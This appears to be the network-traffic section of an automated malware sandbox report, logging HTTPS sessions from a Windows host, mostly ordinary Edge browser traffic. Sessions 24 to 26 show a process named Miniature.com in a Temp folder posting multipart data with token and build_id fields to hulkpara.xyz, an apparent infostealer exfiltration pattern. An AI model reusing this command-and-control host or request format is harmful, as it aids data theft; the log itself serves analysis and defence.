ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                          Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                          Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                          Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                          Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49786 | 162.159.61.3 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:56 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
2024-12-19 07:13:56 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Thu, 19 Dec 2024 07:13:56 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f4597c8da357295-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0e 10 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 01 2c 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 32 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetA,)prod-agic-eu2-2eastus2cloudappazure,<0ns1-06azure-dns,msnhst"',:<)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49789 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:56 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7G4EUKFKXLNYU3WL6PZU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49807 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:58 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----F3E37GL6XLN7YU3OPP89
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:58 UTC | 16355 | OUT | Data Ascii: ------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------F3E37GL6XLN7YU3OPP89Cont
2024-12-19 07:14:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:14:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49816 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:00 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:14:00 UTC | 16355 | OUT | Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------VKNG4E3OZMOZUAAASJ5PCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-19 07:14:03 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:02 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49809 | 23.49.251.8 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:02 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: assets.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
2024-12-19 07:14:02 UTC | 1002 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Type: image/png
